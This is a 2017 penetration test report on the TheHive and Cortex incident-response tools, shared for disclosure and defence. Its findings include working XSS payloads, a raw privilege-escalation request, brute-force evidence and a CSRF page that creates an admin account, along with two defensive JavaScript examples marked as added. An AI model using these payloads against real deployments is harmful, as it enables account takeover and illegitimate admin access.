RANDORISEC

TheHive
PENTEST REPORT

TLP:WHITE


This report is classified TLP:WHITE. TLP:WHITE is information that is for public, unrestricted 
dissemination, publication, web-posting or broadcast. Any member of the Information Exchange may 
publish the information, subject to copyright. 


© RANDORISEC - 2017 Version 1.0 — March 28, 2017 


RANDORISEC TheHive Pentest Report 


1. Executive Summary 


TheHive [1] is a free and open-source security incident response platform. It relies on Cortex [2] to analyze
observables (IP addresses, email addresses, domain names, etc.). Both tools were designed and developed by
TheHive Project [3].

A penetration test, which followed the WAHH [4] methodology, was performed by RANDORISEC to assess
the security level of the platform. We tested TheHive Buckfast 0 (version 2.10.0) and Cortex version
1.0.0.

Positive Points
We were unable to access the web application anonymously. We were also unable to elevate our
privileges without resorting to social engineering tricks.

Negative Points
We have identified a critical vulnerability (Stored Cross-Site Scripting) along with a few less critical ones
(Reflected Cross-Site Scripting, Vertical privilege escalation, Concurrent sessions allowed, No account
lockout policy, No password policy, Information leakage and Cross-Site Request Forgery).

By exploiting these vulnerabilities, an attacker could trick users into executing malicious code in their
browsers and/or computers, or try to brute-force the authentication mechanism. This could lead to
illegitimate access or privilege escalation. The only critical vulnerability we found does not come
directly from TheHive code but from a dependency. The developers were made aware of the
vulnerabilities prior to the publication of this report, in accordance with the responsible disclosure policy [5].
They assured RANDORISEC that most if not all vulnerabilities would be fixed in Buckfast 2 (version
2.10.2), due in April 2017.

We also found some low severity vulnerabilities. They are mainly located in the access part (session
handling and authentication) and should not be very challenging to fix.

[1] https://github.com/CERT-BDF/TheHive
[2] https://github.com/CERT-BDF/Cortex
[3] https://thehive-project.org/
[4] Web Application Hacker's Handbook.
[5] https://vuls.cert.org/confluence/pages/viewpage.action?pageId=4718642
1. Introduction

1.1. Test Period and Duration

The pentest was performed in 4 man-days spanning several weeks, starting on February 9, 2017 and
ending on March 21, 2017.


1.2. Credits 
RANDORISEC and Davy Douhine, the company's CEO, would like to thank the following professionals,
listed in alphabetical order, for their help performing the pentest described in this report:

- Frédéric Cikala
- Nicolas Mattiocco
- Florent Montel
- Mohamed Mrabah
- Maximiliano Soler


Important Note 

RANDORISEC and the pentesting professionals that joined it for this pentest have no contract with
TheHive Project and did not receive any compensation of any sort to perform this pentest.
RANDORISEC and the pentesting professionals listed above performed this work in their free time
as a way to contribute to the security of Free, Open Source Software projects.


1.3. Perimeter and Methodology 

1.3.1. Target 

TheHive and Cortex applications were installed using the public Docker versions, following the
instructions provided at the following location:

https://github.com/CERT-BDF/TheHive/wiki/Docker-guide---TheHive-Cortex

We performed our tests on TheHive Buckfast 0 (version 2.10.0) and on Cortex 1.0.0:

TheHive 2.10.0
Elastic4Play 1.1.2
Play 2.5.9
Elastic4s 2.3.0
ElasticSearch 2.3.0


1.3.2. Restrictions 


No restrictions were made. 


1.3.3. Test cases 
As the mission we took upon ourselves was a pentest and not an audit, this report contains only the
vulnerabilities that were found. However, all the main areas that were checked are listed in the
appendices at the end of this document.


1.4. Confidentiality 


This report and its appendices are classified TLP:WHITE according to Trusted Introducer's ISTLP v1.1 [6].

[6] https://www.trusted-introducer.org/ISTLPv11.pdf
2. Vulnerabilities

Severity levels result from the combination of their impact with their probability of occurrence, which is
quantified according to the following scale: Low (L) — yellow / Medium (M) — orange / High (H) — red.

Note: Only proven or very plausible vulnerabilities are listed. When the tests were not able to highlight
significant security holes, those will not be mentioned (unless the test was explicitly part of the request).

ID   | Vulnerability                 | Target(s)       | Description                                                                                                                                                       | Risk(s)
AP.1 | Stored XSS                    | TheHive         | Malicious JavaScript code can be injected. It will then be executed in the victim's browser.                                                                       | User impersonation
AP.2 | Reflected XSS                 | TheHive, Cortex | Malicious JavaScript code can be injected. It will then be executed in the victim's browser.                                                                       | User impersonation
AP.3 | Vertical privilege escalation | TheHive         | An authenticated simple user can have access to some admin menus.                                                                                                 | Facilitates session usurpation
AP.4 | Concurrent sessions allowed   | TheHive         | Concurrent sessions are allowed for a single user.                                                                                                                | Facilitates session usurpation
AP.5 | No account lockout policy     | TheHive         | Authentication system can be brute-forced.                                                                                                                        | Facilitates user impersonation
AP.6 | No password policy            | TheHive         | As no password policy is enforced when using the local database for storing user credentials, users can set weak passwords (e.g. containing only one character). | Facilitates user impersonation
AP.7 | Information leakage           | TheHive         | Information such as installed software versions (TheHive, ElasticSearch) is publicly available.                                                                    | Sensitive info leak
AP.8 | CSRF                          | TheHive         | As no anti-CSRF tokens are used, TheHive is vulnerable to CSRF attacks.                                                                                           | Illegitimate access

The Severity level column of the original table is colour-coded (yellow, orange or red) and its values are not recoverable from the extracted text.
3. Improvement Suggestions

# | Vulnerability | Target(s)       | Improvement Suggestions                                                                                                                                                                                                                                                                                                                                                                                                                        | Difficulty
1 | AP.1, AP.2    | TheHive, Cortex | If possible, use a white list at the application level by defining the expected characters rather than refusing the dangerous ones. If that's not a possibility, the application should filter meta-characters from user input. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, and consistency across related fields, and conformance to business rules. | 3
2 | AP.3          | TheHive         | Deny access to admin pages to non-admin users.                                                                                                                                                                                                                                                                                                                                                                                                 | 2
3 | AP.4          | TheHive         | Only allow one session per user at any given time.                                                                                                                                                                                                                                                                                                                                                                                             | 2
4 | AP.5          | TheHive         | Enforce an account lockout policy.                                                                                                                                                                                                                                                                                                                                                                                                             | 2
5 | AP.6          | TheHive         | Implement a password policy or use LDAP or AD authentication and ensure your LDAP/AD enforces a password policy.                                                                                                                                                                                                                                                                                                                               | 2
6 | AP.7          | TheHive         | Deny access to potentially sensitive information to anonymous, non-authenticated users.                                                                                                                                                                                                                                                                                                                                                        | 2
7 | AP.8          | TheHive         | Implement anti-CSRF tokens.                                                                                                                                                                                                                                                                                                                                                                                                                    | 2

The Severity column of the original table is colour-coded and its values are not recoverable from the extracted text.
4. Detailed findings

4.1. AP.1 - Stored XSS
TheHive is vulnerable to two HTML and JavaScript stored injections, also known as Stored Cross-Site
Scripting vulnerabilities. They could be used by authenticated users to elevate their privileges, for
example by hijacking an admin's session.

The vulnerabilities are located in the Observables functionality and in the Observable management.

The following screenshots show that the code will be executed in the victim's browser:


1. First Stored XSS: Observables

Attack scenario:

An authenticated user with write access (as defined in the user management page) creates an
observable on a case and puts a malicious JavaScript payload as the value of the observable:

[Screenshot: "Create new observable(s)" form with Data Type = domain, Data = <script>alert(/XSS/)</script> and Tags = thehive]

The JavaScript payload used to test this vulnerability is:
<script>alert(/XSS/)</script>


The observable item is created:

[Screenshot: notification "Observables have been successfully created"]


Then, if a user that can access the case launches one or many analyzers (for example by clicking
on the Run all analyzers link) on this observable:

[Screenshot: "List of observables (1 of 1)" showing a domain observable with data <script>alert(/XSS/)</script>, a "Run all analyzers" link, the tag bibi and the date 03/20/17]

The payload will be triggered:

[Screenshot: browser DOM inspector on the TheHive page, with the injected script element highlighted]

    <!DOCTYPE html>
    <html ng-app="thehive">
    <head>
    <style type="text/css"></style>
    <meta charset="utf-8">
    <title ng-bind="'The Hive' + (title ? ' - ' + title : '')">The Hive</title>
    <meta name="description" content="">
    <meta name="viewport" content="width=device-width">
    <link rel="icon" type="image/png" href="images/favicon.png">
    [...]
    <script>alert(/XSS/)</script>


2. Second Stored XSS: Observables management

Attack scenario:

An authenticated user with admin access (as defined in the user management page) creates a
new observable datatype and puts a malicious JavaScript payload as the value of the datatype:

[Screenshot: "DataTypes" administration form with the value "><svg onload=confirm(/XSSagain/)> and the "Add dataTypes" button]

The JavaScript payload used to test this vulnerability is:
"><svg onload=confirm(/XSSagain/)>


The new observable datatype is created:

[Screenshot: dataType list showing the entry "><svg onload=confirm(/XSSagain/)> with its delete action]


If another admin user tries to delete this new datatype, the payload will be triggered:

[Screenshot: browser dialog showing /XSSagain/]


The response page shows the JavaScript payload:

    <div class="ui-notification success clickable" style="top: 20px; left: 10px;">
    <h3 class="ng-animate ng-hide-animate ng-hide-add" ng-show="title" ng-bind-html="title" data-ng-animate="2" style="
    <div class="message" ng-bind-html="message">
    The datatype ">
    <svg onload="confirm(/XSSagain/)">has been removed</svg>
    </div>
    </div>
    </body>
    </html>


Then the datatype will be deleted. 


This particular behavior of "One-shot Stored XSS" is quite interesting as it could be used to attack
administrators without leaving evidence. However, the prerequisites to exploit it (admin access
to TheHive) lower the risk of an exploitation using this particular attack vector.

The root of the vulnerability comes from the angular-ui-notification library, which seems to trust
inputs as HTML:
https://github.com/alexcrack/angular-ui-notification


An issue has been opened on GitHub: 
https://github.com/alexcrack/angular-ui-notification/issues/86 


Targets | Risk(s)            | Recommendation                                                                                                                                                                                                                                                                                                                                                                                                                                 | Severity
TheHive | User impersonation | If possible, use a white list at the application level by defining the expected characters rather than refusing the dangerous ones. If that's not a possibility, the application should filter meta-characters from user input. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, and consistency across related fields, and conformance to business rules. | (colour-coded)
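The two tiers of the recommendation above, as an added JavaScript example that is not part of this report nor of TheHive's code: a whitelist per observable data type (length and format checked explicitly), with HTML escaping as the fallback for free-text values that end up in an HTML-rendering sink such as the notification message. The data type patterns and the function names are assumptions.

```javascript
// Added example (not from the report or TheHive): whitelist validation of an
// observable value by data type, with HTML escaping as the fallback before a
// value is handed to a component that renders it as HTML (the report's root
// cause: the notification library trusted its input as HTML).

// Whitelist patterns per observable data type (assumed, illustrative only).
const DATA_TYPE_PATTERNS = {
  domain: /^(?=.{1,253}$)([a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$/i,
  ip: /^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$/,
  hash: /^[0-9a-f]{32}$|^[0-9a-f]{40}$|^[0-9a-f]{64}$/i,
};

// Returns { ok: true, value } when the value matches the data type's whitelist,
// or { ok: false, reason } otherwise. Type and length are checked explicitly,
// as the report recommends, instead of only refusing "<" and ">".
function validateObservable(dataType, value) {
  if (typeof value !== 'string') return { ok: false, reason: 'value must be a string' };
  const pattern = DATA_TYPE_PATTERNS[dataType];
  if (!pattern) return { ok: false, reason: `unknown data type: ${dataType}` };
  const trimmed = value.trim();
  if (trimmed.length === 0 || trimmed.length > 1024) {
    return { ok: false, reason: 'value length out of range' };
  }
  if (!pattern.test(trimmed)) {
    return { ok: false, reason: `value is not a valid ${dataType}` };
  }
  return { ok: true, value: trimmed };
}

// Fallback for free-text fields (tags, data type names) with no strict format:
// encode the five HTML meta-characters so a browser renders the string as text
// even when it reaches an innerHTML / ng-bind-html sink.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Builds the removal notice the way a safe UI should: the user-controlled part
// is escaped, only the fixed wrapper text is trusted.
function removalNotice(dataTypeName) {
  return `The datatype ${escapeHtml(dataTypeName)} has been removed`;
}
```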


4.2. AP.2 - Reflected XSS 


TheHive and Cortex are vulnerable to many HTML and JavaScript injections, also known as
Reflected Cross-Site Scripting vulnerabilities. They could be used by authenticated users to elevate
their privileges by hijacking an admin's session, or by anonymous users to impersonate an
authenticated user's session, for example.

The vulnerabilities are located in the new analysis functionality of Cortex and in the handling of
error messages at TheHive's level. However, the latter is very unlikely to be exploited as it needs Internet
Explorer 11 with compatibility mode enabled.


1. Reflected XSS in Cortex

Attack scenario:

A user with access to Cortex [7] starts a new analysis and puts a malicious JavaScript payload in the
Data field:

[Screenshot: "Run new analysis" form in Cortex with TLP = AMBER, Data Type = domain, Data = <script>alert(/XSS/)</script> and the list of analyzers: Abuse_Finder_1_0, VirusTotal_GetReport_2_0, HippoMore_1_0, Hipposcore_1_0, DomainTools_ReverseNameServer_1_0, DomainTools_WhoisLookup_1_0, DomainTools_ReverseWhois_1_0, DomainTools_WhoisHistory_1_0, Fortiguard_URLCategory_1_0, DNSDB_DomainName_1_1, OTXQuery_1_0]

[7] Please note that Cortex does not use any kind of authentication and must not be exposed on public networks.

The JavaScript payload used to validate the vulnerability is:
<script>alert(/XSS/)</script>


The following screenshot shows that the code is executed:

[Screenshot: browser alert dialog showing /XSS/]

An excerpt of the response page showing the JavaScript payload is shown below:

    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="description" content="">
    <meta name="viewport" content="width=device-width">
    <meta content="width=device-width, initial-scale=1,maximum-scale=1,user-s
    <link rel="icon" type="image/png" href="favicon.png">
    <!--Place favicon.ico and apple-touch-icon.png in the root directory-->
    <link rel="stylesheet" href="styles/vendor.c78c20a8.css">
    <link rel="stylesheet" href="styles/main.a83cdc6f.css">
    <script>alert(/XSS/)</script>
    </head>
    <body class="skin-blue layout-top-nav ng-scope" ng-app="cortex">
    <app-container class="wrapper"></app-container>
    <script src="scripts/vendor.e86e854b.js"></script>


2. Reflected XSS in TheHive

Attack scenario:

An anonymous user sends a link containing a JavaScript payload (or a link to it) like the
following:
http://1.1.1.8:8080/api/login?<script>alert("TheHive_vulnerable_to_XSS_;)")</script>

If opened, the code is executed:

[Screenshot: Internet Explorer showing the response "A client error occurred on GET /api/login?" and a dialog ("Message de la page Web") displaying TheHive_vulnerable_to_XSS_;)]

However, the response page states that the content is not HTML (but "text/plain"), so an
exploitation using this attack vector is very unlikely as the victim has to run an old version of
Internet Explorer or Internet Explorer 11 with compatibility mode enabled.

The root of the vulnerability comes from the angular-ui-notification library, which seems to trust
inputs as HTML:
https://github.com/alexcrack/angular-ui-notification

An issue has been opened on GitHub:
https://github.com/alexcrack/angular-ui-notification/issues/86


Targets         | Risk(s)            | Recommendation                                                                                                                                                                                                                                                                                                                                                                                                                                 | Severity
TheHive, Cortex | User impersonation | If possible, use a white list at the application level by defining the expected characters rather than refusing the dangerous ones. If that's not a possibility, the application should filter meta-characters from user input. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, and consistency across related fields, and conformance to business rules. | (colour-coded)


4.3. AP.3 - Vertical privilege escalation

An authenticated user with read-only access can use admin functionality and list the users created in the
database.

Here is a screenshot of a request, asking to list the users, and the response:


[Screenshot: Burp Repeater (target http://thehive.randorisec.fr:8080) showing the request below and its response: HTTP/1.1 200 OK, X-Total: 3, a new PLAY_SESSION cookie (Path=/; HTTPOnly), Content-Type: text/plain; charset=utf-8, Date: Thu, 09 Mar 2017 01:45:35 GMT, Content-Length: 899, and a JSON body listing the users with their fields (createdAt, user, roles ["read", "write", "admin"], createdBy, name, status, updatedBy, updatedAt, _id, type, has-key); 1,169 bytes in 569 millis]
The request used is:

    POST /api/user/_search?range=0-10 HTTP/1.1
    Host: thehive.randorisec.fr:8080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0
    Accept: application/json, text/plain, */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Referer: http://thehive.randorisec.fr:8080/index.html
    Content-Type: application/json;charset=utf-8
    Content-Length: 22
    Cookie: PLAY_SESSION=6b5415864c48577fc69186629e5bcf1f7b40b57c-username=maxi2&expire=1489027489081
    Connection: close

    {"query":{"_any":"*"}}


A malicious user could use this to list the other users and then try to discover their passwords. 


Targets | Risk(s)                        | Recommendation                                 | Severity
TheHive | Facilitates session usurpation | Deny access to admin pages to non-admin users. | (colour-coded)


4.4. AP.4 - Concurrent sessions allowed 


Concurrent sessions are allowed. 


If an attacker finds a way to hijack a session, it could go unnoticed by the legitimate user.


Targets | Risk(s)                        | Recommendation                                     | Severity
TheHive | Facilitates session usurpation | Only allow one session per user at any given time. | (colour-coded)


4.5. AP.5 - No account lockout policy 
An attacker could brute-force the authentication system without being stopped or even slowed 
down. 


Here is a screenshot showing a brute-force of 1000 requests against the login page:

[Screenshot: Burp Intruder "attack 1", Results tab, requests 992 to 999 all answered with status 401 and a response length of 202; the request body is {"user":"test1", "password": "test1"}]

With this issue an attacker could try to discover a user's password.

Targets | Risk(s)                        | Recommendation                     | Severity
TheHive | Facilitates session usurpation | Enforce an account lockout policy. | (colour-coded)
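While no lockout policy exists, the failed logins are still visible in the web server logs. As an added example that is not part of this report nor of TheHive's code, the following JavaScript scans constructed access-log lines for repeated 401 responses to POST /api/login from one client inside a sliding time window, the pattern the Intruder run above produces. The log line format, the thresholds and the function names are assumptions.

```javascript
// Added example (not from the report or TheHive): flag brute-force attempts
// against the login endpoint from access-log lines. The line format is an
// assumption: <client> <ISO timestamp> "<method> <path> <proto>" <status> <size>
const LINE_RE = /^(\S+) (\S+) "(\w+) ([^ "]+)[^"]*" (\d{3})/;

// Parses one access-log line; returns null for lines in another format.
function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const time = Date.parse(m[2]);
  if (Number.isNaN(time)) return null;
  return { client: m[1], time, method: m[3], path: m[4], status: Number(m[5]) };
}

// Returns one alert per client that produced at least `threshold` failed
// logins (HTTP 401 on POST /api/login) inside any sliding window of `windowMs`.
function detectLoginBruteForce(lines, { threshold = 10, windowMs = 60000 } = {}) {
  const failuresByClient = new Map();
  for (const line of lines) {
    const ev = parseLine(line);
    if (!ev || ev.method !== 'POST' || ev.path !== '/api/login' || ev.status !== 401) continue;
    if (!failuresByClient.has(ev.client)) failuresByClient.set(ev.client, []);
    failuresByClient.get(ev.client).push(ev.time);
  }
  const alerts = [];
  for (const [client, times] of failuresByClient) {
    times.sort((a, b) => a - b);
    let start = 0;
    let peak = 0;
    for (let end = 0; end < times.length; end++) {
      // Advance the window start until the window spans at most windowMs.
      while (times[end] - times[start] > windowMs) start++;
      peak = Math.max(peak, end - start + 1);
    }
    if (peak >= threshold) {
      alerts.push({ client, failures: peak, lastAt: new Date(times[times.length - 1]).toISOString() });
    }
  }
  return alerts;
}

// Constructed sample log: one client repeating the failing login of the
// report's Intruder run (401 every second), another client behaving normally.
function sampleLog() {
  const lines = [];
  for (let i = 0; i < 12; i++) {
    const t = new Date(Date.UTC(2017, 2, 9, 1, 45, i)).toISOString();
    lines.push(`10.0.0.5 ${t} "POST /api/login HTTP/1.1" 401 202`);
  }
  lines.push('10.0.0.9 2017-03-09T01:46:00.000Z "POST /api/login HTTP/1.1" 200 312');
  lines.push('10.0.0.9 2017-03-09T01:46:01.000Z "GET /api/status HTTP/1.1" 200 899');
  lines.push('not a log line');
  return lines;
}
```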


4.6. AP.6 - No password policy 


No password policy is enforced in TheHive when using the local database for storing user credentials.
Users can thus set weak passwords (e.g. containing only one character) when changing their
password.


This could help an attacker find valid credentials. 


Targets | Risk(s)                        | Recommendation                                                                                                   | Severity
TheHive | Facilitates session usurpation | Implement a password policy or use LDAP or AD authentication and ensure your LDAP/AD enforces a password policy. | (colour-coded)


4.7. AP.7 - Information leakage
Information such as installed software versions (TheHive, ElasticSearch) is publicly available.
Here is a screenshot showing an anonymous request and the response with the version information:

[Screenshot: Burp showing an unauthenticated GET /api/status request (User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0), Accept-Language: fr-FR) and the JSON response, which begins with "config": { "authType": [ "local" ], "capabilities": [ "changePassword", "setPassword" ] and continues with the version information]

This could help an attacker in their reconnaissance phase.

Targets | Risk(s)                        | Recommendation                                              | Severity
TheHive | Facilitates session usurpation | Deny access to info to anonymous, non-authenticated users. | (colour-coded)
4.8. AP.8 - CSRF (Cross-Site Request Forgery)

As no anti-CSRF tokens are used, TheHive is vulnerable to CSRF attacks.

Here is a screenshot showing an authenticated request, without anti-CSRF token, sent to create a
user:

    POST /api/user HTTP/1.1
    Host: thehive.randorisec.fr:8080
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
    Accept: */*
    Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/json
    Content-Length: 102
    Origin: null
    Cookie: PLAY_SESSION=[session value]-username=theadmin&expire=[timestamp]
    Connection: keep-alive

    {"roles":["read","write","admin"],"login":"hacker10","name":"hacker10 hakcker10","password":"hacker4"}

The response:

    HTTP/1.1 201 Created
    Set-Cookie: PLAY_SESSION=[session value]-username=theadmin&expire=[timestamp]; Path=/; HTTPOnly
    Content-Length: 206
    Content-Type: application/json
    Date: Thu, 16 Mar 2017 16:35:24 GMT

    {"roles":["read","write","admin"],"name":"hacker10 hakcker10","_id":"hacker10","createdAt":1489682174465,"createdBy":"theadmin","user":"theadmin","status":"Ok","id":"hacker10","type":"user","has-key":false}


By using social engineering tricks (or a stored XSS) an attacker could trick an admin into launching the
following request, which will create a user and grant illegitimate access:

    <html>
    <script>
    function jsonreq() {
      var xmlhttp = new XMLHttpRequest();
      xmlhttp.withCredentials = true;
      xmlhttp.open("POST", "http://thehive.randorisec.fr:8080/api/user", true);
      xmlhttp.setRequestHeader("Content-Type", "application/json");
      xmlhttp.send('{"roles":["read","write","admin"],"login":"hacker11","name":"hacker11 hakcker11","password":"hacker4"}');
    }
    jsonreq();
    </script>
    </html>

However, this behavior is prohibited by modern browsers and the Same-origin policy (SOP).
Nonetheless, this vulnerability should be taken into consideration, as a loosely configured CORS
(Cross-Origin Resource Sharing) policy could increase the probability of such an attack.


Targets | Risk(s)                        | Recommendation              | Severity
TheHive | Facilitates session usurpation | Implement anti-CSRF tokens. | (colour-coded)
5. Appendices

5.1 WAHH checks

Recon and analysis
- Map visible content
- Discover hidden & default content
- Test for debug parameters
- Identify data entry points
- Identify the technologies used
- Map the attack surface

Authentication
- Test password quality rules
- Test for username enumeration
- Test resilience to password guessing
- Test any account recovery function
- Test any "remember me" function
- Test any impersonation function
- Test username uniqueness
- Check for unsafe distribution of credentials
- Test for fail-open conditions
- Test any multi-stage mechanisms

Session handling
- Test tokens for meaning
- Test tokens for predictability
- Check for insecure transmission of tokens
- Check for disclosure of tokens in logs
- Check mapping of tokens to sessions
- Check session termination
- Check for session fixation
- Check for cross-site request forgery
- Check cookie scope

Access controls
- Understand the access control requirements
- Test effectiveness of controls, using multiple accounts
- Test for insecure access control methods (Referer, etc)

Input handling
- Fuzz all request parameters
- Test for SQL injection
- Identify all reflected data
- Test for reflected XSS
- Test for HTTP header injection
- Test for arbitrary redirection
- Test for stored attacks
- Test for OS command injection
- Test for path traversal
- Test for script injection
- Test for file inclusion
- Test for SMTP injection
- Test for native software flaws (BoF, integer bugs, format strings)
- Test for SOAP injection
- Test for LDAP injection
- Test for XPath injection

Application logic
- Identify the logic attack surface
- Test transmission of data via the client
- Test for reliance on client-side input validation
- Test any thick-client components (Java, ActiveX, Flash)
- Test multi-stage processes for logic flaws
- Test handling of incomplete input
- Test trust boundaries
- Test transaction logic

Shared hosting
- Test segregation in shared infrastructures
- Test segregation between ASP-hosted applications

Test for web server vulnerabilities
- Default credentials
- Default content
- Dangerous HTTP methods
- Proxy functionality
- Virtual hosting mis-configuration
- Bugs in web server software

Miscellaneous checks
- Check for DOM-based attacks
- Check for frame injection
- Check for local privacy vulnerabilities
- Persistent cookies
- Caching
- Sensitive data in URL parameters
- Forms with autocomplete enabled
- Follow up any information leakage
- Check for weak SSL ciphers

In the original table each check is marked as performed (X) or N/A (not applicable); the marks cannot be mapped to individual checks from the extracted text.